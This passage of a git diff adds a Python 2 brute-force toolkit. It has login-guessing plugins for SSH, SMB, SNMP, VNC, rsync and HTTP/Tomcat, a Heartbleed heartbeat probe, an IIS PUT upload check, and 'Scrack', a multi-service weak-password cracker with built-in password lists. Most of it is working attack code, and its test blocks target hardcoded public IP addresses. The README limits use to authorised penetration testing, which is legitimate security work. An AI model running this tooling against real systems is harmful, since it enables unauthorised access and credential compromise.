b/Bruteforce/plugins/rsync.pyc differ diff --git a/Bruteforce/plugins/rsynclib.py b/Bruteforce/plugins/rsynclib.py new file mode 100644 index 0000000..816cf67 --- /dev/null +++ b/Bruteforce/plugins/rsynclib.py @@ -0,0 +1,194 @@ +import base64 +import re +try: + import hashlib + hash_md4 = hashlib.new("md4") + hash_md5 = hashlib.md5() +except ImportError: + # for Python << 2.5 + import md4 + import md5 + hash_md4 = md4.new() + hash_md5 = md5.new() + +# Import SOCKS module if it exists, else standard socket module socket +try: + import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket + from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn +except ImportError: + import socket +from socket import _GLOBAL_DEFAULT_TIMEOUT + +__all__ = ["rsync"] + + + +# The standard rsync server control port +RSYNC_PORT = 873 +# The sizehint parameter passed to readline() calls +MAXLINE = 8192 +protocol_version = 0 + +# Exception raised when an error or invalid response is received +class Error(Exception): pass + +# All exceptions (hopefully) that may be raised here and that aren't +# (always) programming errors on our side +all_errors = (Error, IOError, EOFError) + + +# Line terminators for rsync +CRLF = '\r\n' +LF = '\n' + +# The class itself +class rsync: + '''An rsync client class. + + To create a connection, call the class using these arguments: + host, module, user, passwd + + All arguments are strings, and have default value ''. + Then use self.connect() with optional host and port argument. + ''' + debugging = 0 + host = '' + port = RSYNC_PORT + maxline = MAXLINE + sock = None + file = None + server_protocol_version = None + + # Initialization method (called by class instantiation). + # Initialize host to localhost, port to standard rsync port + # Optional arguments are host (for connect()), + # and module, user, passwd (for login()) + def __init__(self, host='', module='', user='', passwd='',port=873, + timeout=_GLOBAL_DEFAULT_TIMEOUT): + self.timeout = timeout + if host: + self.connect(host) + if module and user and passwd: + self.login(module, user, passwd) + + def connect(self, host='', port=0, timeout=-999): + '''Connect to host. Arguments are: + - host: hostname to connect to (string, default previous host) + - port: port to connect to (integer, default previous port) + ''' + if host != '': + self.host = host + if port > 0: + self.port = port + if timeout != -999: + self.timeout = timeout + self.sock = socket.create_connection((self.host, self.port), self.timeout) + self.af = self.sock.family + self.file = self.sock.makefile('rb') + self.server_protocol_version = self.getresp() + self.protocol_version = self.server_protocol_version[-2:] + return self.server_protocol_version + + + def set_debuglevel(self, level): + '''Set the debugging level. + The required argument level means: + 0: no debugging output (default) + 1: print commands and responses but not body text etc. + ''' + self.debugging = level + debug = set_debuglevel + + # Internal: send one line to the server, appending LF + def putline(self, line): + line = line + LF + if self.debugging > 1: print '*put*', line + self.sock.sendall(line) + + # Internal: return one line from the server, stripping LF. + # Raise EOFError if the connection is closed + def getline(self): + line = self.file.readline(self.maxline + 1) + if len(line) > self.maxline: + raise Error("got more than %d bytes" % self.maxline) + if self.debugging > 1: + print '*get*', line + if not line: raise EOFError + if line[-2:] == CRLF: line = line[:-2] + elif line[-1:] in CRLF: line = line[:-1] + return line + + # Internal: get a response from the server, which may possibly + # consist of multiple lines. Return a single string with no + # trailing CRLF. If the response consists of multiple lines, + # these are separated by '\n' characters in the string + def getmultiline(self): + line = self.getline() + return line + + # Internal: get a response from the server. + # Raise various errors if the response indicates an error + def getresp(self): + resp = self.getmultiline() + if self.debugging: print '*resp*', resp + if resp.find('ERROR') != -1: + raise Error, resp + else: + return resp + + def sendcmd(self, cmd): + '''Send a command and return the response.''' + self.putline(cmd) + return self.getresp() + + def login(self, module='', user = '', passwd = ''): + if not user: user = 'www' + if not passwd: passwd = 'www' + if not module: module = 'www' + + self.putline(self.server_protocol_version) +# self.putline('@RSYNCD: 28.0') +# self.protocol_version = 28 + resp = self.sendcmd(module) + + challenge = resp[resp.find('AUTHREQD ')+9:] + + if self.protocol_version >= 30: + md5=hashlib.md5() + md5.update(passwd) + md5.update(challenge) + hash = base64.b64encode(md5.digest()) + else: + md4=hashlib.new('md4') + tmp = '\0\0\0\0' + passwd + challenge + md4.update(tmp) + hash = base64.b64encode(md4.digest()) + + response, number = re.subn(r'=+$','',hash) + print response + resp = self.sendcmd(user + ' ' + response) + + if resp.find('OK') == -1: + raise Error, resp + return resp + + def getModules(self): + '''Get modules on the server''' + print self.server_protocol_version + self.putline(self.server_protocol_version) + + resp = self.sendcmd('') + print resp + return resp + + + + def close(self): + '''Close the connection without assuming anything about it.''' + self.putline('') + if self.file is not None: + self.file.close() + if self.sock is not None: + self.sock.close() + self.file = self.sock = None + diff --git a/Bruteforce/plugins/rsynclib.pyc b/Bruteforce/plugins/rsynclib.pyc new file mode 100644 index 0000000..e5cd243 Binary files /dev/null and b/Bruteforce/plugins/rsynclib.pyc differ diff --git a/Bruteforce/plugins/rsyncs.pyc b/Bruteforce/plugins/rsyncs.pyc new file mode 100644 index 0000000..11bd951 Binary files /dev/null and b/Bruteforce/plugins/rsyncs.pyc differ diff --git a/Bruteforce/plugins/smb.py b/Bruteforce/plugins/smb.py new file mode 100644 index 0000000..1232474 --- /dev/null +++ b/Bruteforce/plugins/smb.py @@ -0,0 +1,72 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from impacket.smbconnection import * +from multiprocessing.dummy import Pool +from threading import Thread + + +class smb_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/smb.conf") + + def smb_connect(self,ip,username,password): + crack =0 + try: + smb = SMBConnection('*SMBSERVER', ip) + smb.login(username,password) + smb.logoff() + crack =1 + except Exception, e: + self.lock.acquire() + print "%s smb 's %s:%s login fail " %(ip,username,password) + self.lock.release() + return crack + + def smb_l(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + if self.smb_connect(ip,username,password)==1: + self.lock.acquire() + printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['smb']): + printPink("crack smb now...") + print "[*] start crack smb serice %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['smb']: + pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop smb serice %s" % time.ctime() + print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'smb': ['10.211.55.3:445']} + pinglist=['101.201.177.35'] + test=smb_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of file diff --git a/Bruteforce/plugins/smb.pyc b/Bruteforce/plugins/smb.pyc new file mode 100644 index 0000000..ba92815 Binary files /dev/null and b/Bruteforce/plugins/smb.pyc differ diff --git a/Bruteforce/plugins/snmp.py b/Bruteforce/plugins/snmp.py new file mode 100644 index 0000000..9405ee3 --- /dev/null +++ b/Bruteforce/plugins/snmp.py @@ -0,0 +1,65 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +from pysnmp.entity.rfc3413.oneliner import cmdgen + + +class snmp_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/snmp.conf") + + def snmp_connect(self,ip,key): + crack =0 + try: + errorIndication, errorStatus, errorIndex, varBinds =\ + cmdgen.CommandGenerator().getCmd( + cmdgen.CommunityData('my-agent',key, 0), + cmdgen.UdpTransportTarget((ip, 161)), + (1,3,6,1,2,1,1,1,0) + ) + if varBinds: + crack=1 + except: + pass + return crack + + def snmp_l(self,ip,port): + try: + for data in self.lines: + flag=self.snmp_connect(ip,key=data) + if flag==1: + self.lock.acquire() + printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) + self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) + self.lock.release() + break + else: + self.lock.acquire() + print "test %s snmp's scan fail" %(ip) + self.lock.release() + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + printPink("crack snmp now...") + print "[*] start crack snmp %s" % time.ctime() + starttime=time.time() + pool=Pool(threads) + for ip in pinglist: + pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],"")) + + pool.close() + pool.join() + + print "[*] stop crack snmp %s" % time.ctime() + print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + diff --git a/Bruteforce/plugins/snmp.pyc b/Bruteforce/plugins/snmp.pyc new file mode 100644 index 0000000..4e77b89 Binary files /dev/null and b/Bruteforce/plugins/snmp.pyc differ diff --git a/Bruteforce/plugins/ssh.py b/Bruteforce/plugins/ssh.py new file mode 100644 index 0000000..9cce4aa --- /dev/null +++ b/Bruteforce/plugins/ssh.py @@ -0,0 +1,84 @@ +#coding=utf-8 +import time +import threading +from multiprocessing.dummy import Pool +from printers import printPink,printGreen +import paramiko + + +class ssh_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/ssh.conf") + + def ssh_connect(self,ip,username,password,port): + crack=0 + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect(ip,port,username=username, password=password) + crack=1 + client.close() + except Exception,e: + if e[0]=='Authentication failed.': + self.lock.acquire() + print "%s ssh service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + else: + self.lock.acquire() + print "connect %s ssh service at %s login fail " %(ip,port) + self.lock.release() + crack=2 + return crack + + def ssh_l(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.ssh_connect(ip,username,password,port) + if flag==2: + break + if flag==1: + self.lock.acquire() + printGreen("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ssh']): + printPink("crack ssh now...") + print "[*] start crack ssh %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['ssh']: + pool.apply_async(func=self.ssh_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop ssh serice %s" % time.ctime() + print "[*] crack ssh done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ssh': ['139.129.30.58:22']} + pinglist=['122.225.81.129'] + test=ssh_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of file diff --git a/Bruteforce/plugins/ssh.pyc b/Bruteforce/plugins/ssh.pyc new file mode 100644 index 0000000..1e42932 Binary files /dev/null and b/Bruteforce/plugins/ssh.pyc differ diff --git a/Bruteforce/plugins/ssltest.py b/Bruteforce/plugins/ssltest.py new file mode 100644 index 0000000..207d91d --- /dev/null +++ b/Bruteforce/plugins/ssltest.py @@ -0,0 +1,145 @@ +#!/usr/bin/python +import sys +import struct +import socket +import select +import time +import threading +from printers import printPink,printRed +from multiprocessing.dummy import Pool + +class ssl_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + + self.hello = self.h2bin(''' + 16 03 02 00 dc 01 00 00 d8 03 02 53 + 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf + bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 + 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 + 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c + c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 + c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 + c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c + c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 + 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 + 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 + 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 + 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 + 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 + 00 0f 00 01 01 + ''') + + self.hb = self.h2bin(''' + 18 03 02 00 03 + 01 40 00 + ''') + + + def h2bin(self,x): + return x.replace(' ', '').replace('\n', '').decode('hex') + + + def recvall(self,s, length, timeout=8): + endtime = time.time() + timeout + rdata = '' + remain = length + while remain > 0: + rtime = endtime - time.time() + if rtime < 0: + return None + r, w, e = select.select([s], [], [], 5) + if s in r: + data = s.recv(remain) + # EOF? + if not data: + return None + rdata += data + remain -= len(data) + return rdata + + def recvmsg(self,s): + hdr = self.recvall(s, 5) + if hdr is None: + return None, None, None + typ, ver, ln = struct.unpack('>BHH', hdr) + pay = self.recvall(s, ln, 10) + return typ, ver, pay + + + def hit_hb(self,s,ip,port): + s.send(self.hb) + while True: + typ, ver, pay = self.recvmsg(s) + if typ is None: + return False + + if typ == 24: + if len(pay) > 3: + self.lock.acquire() + printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) + self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) + self.lock.release() + else: + self.lock.acquire() + printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) + self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) + self.lock.release() + return True + + if typ == 21: + return False + + def openssl_test(self,ip,port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sys.stdout.flush() + s.connect((ip, port)) + sys.stdout.flush() + s.send(self.hello) + sys.stdout.flush() + while True: + typ, ver, pay = self.recvmsg(s) + if typ == None: + break + # Look for server hello done message. + if typ == 22 and ord(pay[0]) == 0x0E: + break + sys.stdout.flush() + s.send(self.hb) + self.hit_hb(s,ip,port) + except Exception,e: + #print e + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ssl']): + printPink("crack ssl now...") + print "[*] start test openssl_heart %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + for ip in ipdict['ssl']: + pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop ssl serice %s" % time.ctime() + print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ssl': ['222.22.224.142:443']} + pinglist=['122.225.81.129'] + test=ssl_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") diff --git a/Bruteforce/plugins/ssltest.pyc b/Bruteforce/plugins/ssltest.pyc new file mode 100644 index 0000000..00cfc1c Binary files /dev/null and b/Bruteforce/plugins/ssltest.pyc differ diff --git a/Bruteforce/plugins/tomcat.pyc b/Bruteforce/plugins/tomcat.pyc new file mode 100644 index 0000000..f78b1bd Binary files /dev/null and b/Bruteforce/plugins/tomcat.pyc differ diff --git a/Bruteforce/plugins/vnc.py b/Bruteforce/plugins/vnc.py new file mode 100644 index 0000000..72fefee --- /dev/null +++ b/Bruteforce/plugins/vnc.py @@ -0,0 +1,74 @@ +from printers import printPink,printGreen +import time +import threading +from multiprocessing.dummy import Pool +from vnclib import * + + +class vnc_burp(object): + + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/vnc.conf") + + def vnc_connect(self,ip,port,password): + crack =0 + try: + v = VNC() + v.connect(ip, port, 10) + code,mesg=v.login(password) + if mesg=='OK': + crack=1 + except Exception,e: + crack=2 + pass + return crack + + def vnc_l(self,ip,port): + try: + for data in self.lines: + flag=self.vnc_connect(ip=ip,port=port,password=data) + if flag==2: + self.lock.acquire() + print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port) + self.lock.release() + break + + if flag==1: + self.lock.acquire() + printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) + self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) + self.lock.release() + break + else: + self.lock.acquire() + print "login %s vnc service with %s fail " %(ip,data) + self.lock.release() + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['vnc']): + printPink("crack vnc now...") + print "[*] start crack vnc %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['vnc']: + pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop vnc serice %s" % time.ctime() + print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + + diff --git a/Bruteforce/plugins/vnc.pyc b/Bruteforce/plugins/vnc.pyc new file mode 100644 index 0000000..3fbd2ad Binary files /dev/null and b/Bruteforce/plugins/vnc.pyc differ diff --git a/Bruteforce/plugins/vnclib.py b/Bruteforce/plugins/vnclib.py new file mode 100644 index 0000000..eaf6470 --- /dev/null +++ b/Bruteforce/plugins/vnclib.py @@ -0,0 +1,97 @@ +__author__ = 'wilson' +from Crypto.Cipher import DES +from sys import version_info +import time + +class VNC_Error(Exception): + pass +class VNC: + def connect(self, host, port, timeout): + self.fp = socket.create_connection((host, port), timeout=timeout) + resp = self.fp.recv(99) # banner + + self.version = resp[:11].decode('ascii') + + if len(resp) > 12: + raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore'))) + + return self.version + + def login(self, password): + major, minor = self.version[6], self.version[10] + + if (major, minor) in [('3', '8'), ('4', '1')]: + proto = b'RFB 003.008\n' + + elif (major, minor) == ('3', '7'): + proto = b'RFB 003.007\n' + + else: + proto = b'RFB 003.003\n' + + self.fp.sendall(proto) + + time.sleep(0.5) + + resp = self.fp.recv(99) + + + if minor in ('7', '8'): + code = ord(resp[0:1]) + if code == 0: + raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) + + self.fp.sendall(b'\x02') # always use classic VNC authentication + resp = self.fp.recv(99) + + else: # minor == '3': + code = ord(resp[3:4]) + if code != 2: + raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) + + resp = resp[-16:] + + if len(resp) != 16: + raise VNC_Error('Unexpected challenge size (No authentication required? Unsupported authentication type?)') + + + pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded + + key = self.gen_key(pw) + + + des = DES.new(key, DES.MODE_ECB) + enc = des.encrypt(resp) + + + self.fp.sendall(enc) + + resp = self.fp.recv(99) + + self.fp.close() + code = ord(resp[3:4]) + mesg = resp[8:].decode('ascii', 'ignore') + + if code == 1: + return code, mesg or 'Authentication failure' + + elif code == 0: + return code, mesg or 'OK' + + else: + raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code)) + + def gen_key(self, key): + newkey = [] + for ki in range(len(key)): + bsrc = ord(key[ki]) + btgt = 0 + for i in range(8): + if bsrc & (1 << i): + btgt = btgt | (1 << 7-i) + newkey.append(btgt) + + if version_info[0] == 2: + return ''.join(chr(c) for c in newkey) + else: + return bytes(newkey) diff --git a/Bruteforce/plugins/vnclib.pyc b/Bruteforce/plugins/vnclib.pyc new file mode 100644 index 0000000..6b34151 Binary files /dev/null and b/Bruteforce/plugins/vnclib.pyc differ diff --git a/Bruteforce/plugins/web.py b/Bruteforce/plugins/web.py new file mode 100644 index 0000000..efa49c8 --- /dev/null +++ b/Bruteforce/plugins/web.py @@ -0,0 +1,119 @@ +#coding=utf-8 +import threading +from printers import printPink,printRed,printGreen +from multiprocessing.dummy import Pool +import requests +import socket +import httplib +import time +import urlparse +import urllib2 +import re +import base64 + + +class web_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.tomcatlines=self.config.file2list("conf/tomcat.conf") + self.weblines=self.config.file2list("conf/web.conf") + + def weblogin(self,url,ip,port,username,password): + try: + creak=0 + header={} + login_pass=username+':'+password + header['Authorization']='Basic '+base64.encodestring(login_pass) + #header base64.encodestring 会多加一个回车号 + header['Authorization']=header['Authorization'].replace("\n","") + r=requests.get(url,headers=header,timeout=8) + if r.status_code==200: + self.result.append("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.acquire() + printGreen("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + creak=1 + else: + self.lock.acquire() + print "%s service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + except Exception,e: + pass + return creak + + + def webmain(self,ip,port): + #iis_put vlun scann + try: + url='http://'+ip+':'+str(port)+'/'+str(time.time())+'.txt' + r = requests.put(url,data='hi~',timeout=10) + if r.status_code==201: + self.lock.acquire() + printGreen('%s has iis_put vlun at %s\r\n' %(ip,port)) + self.lock.release() + self.result.append('%s has iis_put vlun at %s\r\n' %(ip,port)) + except Exception,e: + #print e + pass + + #burp 401 web + try: + url='http://'+ip+':'+str(port) + url_get=url+'/manager/html' + r=requests.get(url_get,timeout=8)#tomcat + r2=requests.get(url,timeout=8)#web + + if r.status_code==401: + for data in self.tomcatlines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.weblogin(url_get,ip,port,username,password) + if flag==1: + break + + elif r2.status_code==401: + for data in self.weblines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.weblogin(url,ip,port,username,password) + if flag==1: + break + else: + pass + + except Exception,e: + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['http']): + print "[*] start test web burp at %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['http']: + pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime() + print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'http': ['192.168.1.1:80']} + pinglist=['192.168.1.1'] + test=web_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + diff --git a/Bruteforce/plugins/web.pyc b/Bruteforce/plugins/web.pyc new file mode 100644 index 0000000..70967e9 Binary files /dev/null and b/Bruteforce/plugins/web.pyc differ diff --git a/Bruteforce/requirements.txt b/Bruteforce/requirements.txt new file mode 100644 index 0000000..31aa2df --- /dev/null +++ b/Bruteforce/requirements.txt @@ -0,0 +1,12 @@ +MySQL-python 1.2.4 +pymssql 2.1.1 +impacket +requests +pysnmp 4.2.5 +pycrypto 2.6.1 +paramiko 1.1.5 +python-ldap 2.4.13 +pymongo 2.4 +psycopg2 +redis +IPy diff --git a/Bruteforce/result/.DS_Store b/Bruteforce/result/.DS_Store new file mode 100644 index 0000000..5008ddf Binary files /dev/null and b/Bruteforce/result/.DS_Store differ diff --git a/Scrack/README.md b/Scrack/README.md new file mode 100644 index 0000000..4c434dd --- /dev/null +++ b/Scrack/README.md @@ -0,0 +1,24 @@ +# Scrack(服务弱口令检测脚本) + +1. 功能 + 一款python编写的轻量级弱口令检测脚本,目前支持以下服务:FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。 +2. 特点 + 命令行、单文件,绿色方便各种情况下的使用。 + 无需任何外库以及外部程序支持,所有协议均采用socket与内置库进行检测。 + 兼容OSX、LINUX、WINDOWS,Python 2.6+(更低版本请自行测试,理论上均可运行)。 +3. 参数说明 + python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] + -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 + -p 指定要扫描端口列表,多个端口使用,隔开 例如:1433,3306,5432。未指定即使用内置默认端口进行扫描(21,23,1433,3306,5432,6379,9200,11211,27017) + -m 指定线程数量 默认100线程 + -t 指定请求超时时间。 + -d 指定密码字典。 + -n 不进行存活探测(ICMP)直接进行扫描。 +4. 使用例子 + python Scrack.py -h 10.111.1 + python Scrack.py -h 192.168.1.1 -d pass.txt + python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6 + python Scrack.py.py -h ip.ini -n +5. 法律声明 + 此脚本仅可用于授权的渗透测试以及自身的安全检测中。 + 此脚本仅用于学习以及使用,可自由进行改进,禁止提取加入任何有商业行为的产品中。 diff --git a/Scrack/Scrack.py b/Scrack/Scrack.py new file mode 100644 index 0000000..a70152c --- /dev/null +++ b/Scrack/Scrack.py @@ -0,0 +1,521 @@ +#coding:utf-8 + +import getopt +import sys +import Queue +import threading +import socket +import urllib2 +import time +import os +import re +import ftplib +import hashlib +import struct +import binascii +import telnetlib +import array + +queue = Queue.Queue() +mutex = threading.Lock() +TIMEOUT = 10 +I = 0 +USER_DIC = { + "ftp":['www','admin','root','db','wwwroot','data','web','ftp'], + "mysql":['root'], + "mssql":['sa'], + "telnet":['administrator','admin','root','cisco'], + "postgresql":['postgres','admin'], + "redis":['null'], + "mongodb":['null'], + "memcached":['null'], + "elasticsearch":['null'] +} +PASSWORD_DIC = ['123456','admin','root','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2016','{user}2015','{user}!','','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','fuckyou','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!','p@ssw0rd!','password1','r00t','tomcat','apache','system'] +REGEX = [['ftp', '21', '^220.*?ftp|^220-|^220 Service|^220 FileZilla'], ['telnet', '23', '^\\xff[\\xfa-\\xfe]|^\\x54\\x65\\x6c|Telnet'],['mssql', '1433', ''], ['mysql', '3306', '^.\\0\\0\\0.*?mysql|^.\\0\\0\\0\\n|.*?MariaDB server'], ['postgresql', '5432', ''], ['redis', '6379', '-ERR|^\\$\\d+\\r\\nredis_version'], ['elasticsearch', '9200', ''], ['memcached', '11211', '^ERROR'], ['mongodb', '27017', '']] +class Crack(): + def __init__(self,ip,port,server,timeout): + self.ip = ip + self.port = port + self.server = server + self.timeout = timeout + def run(self): + user_list = USER_DIC[self.server] + #print user_list + for user in user_list: + for pass_ in PASSWORD_DIC: + pass_ = str(pass_.replace('{user}', user)) + k = getattr(self,self.server) + result = k(user,pass_) + if result:return result + def ftp(self,user,pass_): + try: + ftp=ftplib.FTP() + ftp.connect(self.ip,self.port) + ftp.login(user,pass_) + if user == 'ftp':return "anonymous" + return "username:%s,password:%s"%(user,pass_) + except Exception,e: + pass + def mysql(self,user,pass_): + sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((self.ip,int(self.port))) + packet = sock.recv(254) + plugin,scramble = self.get_scramble(packet) + if not scramble:return 3 + auth_data = self.get_auth_data(user,pass_,scramble,plugin) + sock.send(auth_data) + result = sock.recv(1024) + if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00": + return "username:%s,password:%s" % (user,pass_) + def postgresql(self,user,pass_):#author:hos@YSRC + try: + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((self.ip,int(self.port))) + packet_length = len(user) + 7 +len("\x03user database postgres application_name psql client_encoding UTF8 ") + p="%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c"%( 0,0,0,packet_length,0,0,0,0,user,0,0,0,0,0,0,0,0) + sock.send(p) + packet = sock.recv(1024) + psql_salt=[] + if packet[0]=='R': + a=str([packet[4]]) + b=int(a[4:6],16) + authentication_type=str([packet[8]]) + c=int(authentication_type[4:6],16) + if c==5:psql_salt=packet[9:] + else:return 3 + buf=[] + salt = psql_salt + lmd5= self.make_response(buf,user,pass_,salt) + packet_length1=len(lmd5)+5+len('p') + pp='p%c%c%c%c%s%c'%(0,0,0,packet_length1 - 1,lmd5,0) + sock.send(pp) + packet1 = sock.recv(1024) + if packet1[0] == "R": + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + def redis(self,user,pass_): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("INFO\r\n") + result = s.recv(1024) + if "redis_version" in result: + return "unauthorized" + elif "Authentication" in result: + for pass_ in PASSWORD_DIC: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("AUTH %s\r\n"%(pass_)) + result = s.recv(1024) + if '+OK' in result: + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + def mssql(self,user,pass_):#author:hos@YSRC + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((self.ip,self.port)) + hh=binascii.b2a_hex(self.ip) + husername=binascii.b2a_hex(user) + lusername=len(user) + lpassword=len(pass_) + ladd=len(self.ip)+len(str(self.port))+1 + hladd=hex(ladd).replace('0x','') + hpwd=binascii.b2a_hex(pass_) + pp=binascii.b2a_hex(str(self.port)) + address=hh+'3a'+pp + hhost= binascii.b2a_hex(self.ip) + 